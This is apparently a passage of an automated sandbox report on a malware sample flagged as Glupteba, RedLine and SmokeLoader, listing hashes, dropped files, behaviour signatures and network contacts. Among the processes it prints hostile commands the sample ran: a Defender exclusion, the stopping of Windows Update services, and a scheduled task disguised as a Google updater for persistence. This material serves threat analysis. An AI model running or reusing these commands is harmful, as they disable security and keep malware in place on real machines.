| SHA512 | 1f8d866a8b5ae27e7384c836523c8d95bdf1161af912f638a2a4bc3838360894dfb2a762860e6bafe57926d65fe82f0e6c4809875e34869faf146fc3815444d1 |
memory/2148-422-0x0000000000400000-0x0000000000537000-memory.dmp
\Users\Admin\AppData\Local\Temp\A801.exe
| MD5 | cb9c0e031b66ebc72cf5f0ae427d7be8 |
| SHA1 | addc6823db0e1a2dadd1bc55964b9796a8bbeabe |
| SHA256 | 57d980514ed74841448161cb3e8a8ac232e6b480c562f2d0c0a0370121ceaa14 |
| SHA512 | 8d76740411f73184082d048f5a4be285647f321b2ff6bfba7cd0c859de26a5907156a25d00e4b38f5e2e8a225890de7abf78c10db7913df8d0629d395bf48ae4 |
memory/2332-424-0x0000000000220000-0x00000000002B1000-memory.dmp
memory/784-430-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2288-446-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2288-445-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2288-465-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2288-468-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2288-467-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | 05de097ef8b1e444f23f1a1af553f00b |
| SHA1 | cb1840aec95386161e9ae83d8652f9d2f700cfa0 |
| SHA256 | 6f898080d2a482dd8b5fb5062576c6d5ef3d9b0ebdb38de5c5ec53b5f6dcd1b1 |
| SHA512 | 6c41ad83c8c6707517d29c51ac4b65516e394032fe2f360ba5a556cb963c9307c1b5461ce24085afeafd34b5291cd9ff27ce02b6f9854d8516231ba5d6fc06b0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 78430c931df9506c16d1f104d45146a1 |
| SHA1 | fc9cc77803483da463cb6a749d0a736d6202730c |
| SHA256 | 8d6d153555d4c9e551c058dd2ec0ea62dc109bf1105aaee441122f8aadeaf90c |
| SHA512 | 0b1fc97e0c579be126ccc9dc84d147623b55ad1cfa8004405c42a9e1fd49f45f3cac0d1bf9e13dca94d75980a8c1d404a3aed651bdc180feb9b2c57913de8811 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | 15eb6a0a73d63add20b76f716f66b924 |
| SHA1 | 765ce3d5271c1d924df404c075218a279d8bae8d |
| SHA256 | a00dbef09e2a13c959199d60094c04197b98a20247872d0d1934cb757d2d3d09 |
| SHA512 | 6864e70d14ba6e87d8eacf7a4a0e130dfa1e9370aba44a1ce1d69dabe2ed083a1925f5bf8192e98d142d9c279429d678e36fe6af186276931e536bfaa648815d |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-11 10:55
Reported
2023-12-11 10:57
Platform
win10v2004-20231127-en
Max time kernel
121s
Max time network
155s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9438.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9630.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9438.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A04F.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tuc3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\xrecode3\xrecode3.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\xrecode3\xrecode3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4632 set thread context of 3356 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-JR7S3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-UHCH4.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-TKQK2.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-J225L.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-6HA0E.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-O09NH.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-LKG32.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-OPU6H.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-JTNOC.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-T4H87.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-PG79Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-56FP5.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-P7QHH.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-7A8FF.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-VP10Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\stuff\is-HTCD4.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-JS30A.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-UA3CG.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-2R912.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-TONQ3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-AC188.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-75DRS.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-SC8LN.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-HNVCA.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-NRF0U.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-M3DEL.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-C1LN7.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-8E9TH.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-N29E6.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-TUP7T.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-773TJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\plugins\internal\is-S6NSF.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\plugins\internal\is-FLJO1.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\is-DFEK0.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-GS1DF.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-H37O2.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-M60G9.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-Q3N15.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\lessmsi\is-HNIOE.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-P4P8Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\install\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-SKAJ1.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-4TASE.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\install\is-9TPRH.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\stuff\is-19AA3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\xrecode3\install\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\stuff\is-08BFP.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-GQ6OM.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-33U2U.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-SDNEI.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-PIJ7J.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-34674.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-JAT3P.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\stuff\is-74KT5.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-205VN.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-53DRO.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-GFECJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-537HK.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-TAJQS.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\xrecode3\xrecode3.exe | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-01OB0.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-IIB1J.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-V9BA3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe
"C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe"
C:\Users\Admin\AppData\Local\Temp\9630.exe
C:\Users\Admin\AppData\Local\Temp\9630.exe
C:\Users\Admin\AppData\Local\Temp\9438.exe
C:\Users\Admin\AppData\Local\Temp\9438.exe
C:\Users\Admin\AppData\Local\Temp\A04F.exe
C:\Users\Admin\AppData\Local\Temp\A04F.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp" /SL5="$6011E,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Program Files (x86)\xrecode3\xrecode3.exe
"C:\Program Files (x86)\xrecode3\xrecode3.exe" -i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Program Files (x86)\xrecode3\xrecode3.exe
"C:\Program Files (x86)\xrecode3\xrecode3.exe" -s
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 1
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| RU | 81.19.131.34:80 | 81.19.131.34 | tcp |
| US | 8.8.8.8:53 | 34.131.19.81.in-addr.arpa | udp |
| RU | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 8.8.8.8:53 | 19.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| RU | 81.19.131.34:80 | 81.19.131.34 | tcp |
| MD | 176.123.7.190:32927 | tcp | |
| US | 8.8.8.8:53 | 190.7.123.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
memory/4852-0-0x0000000000400000-0x000000000040B000-memory.dmp
memory/3384-1-0x0000000000880000-0x0000000000896000-memory.dmp
memory/4852-3-0x0000000000400000-0x000000000040B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9630.exe
| MD5 | f88edad62a7789c2c5d8047133da5fa7 |
| SHA1 | 41b1f056cdda764a1c7c402c6fa4f8ab2f3ce5f9 |
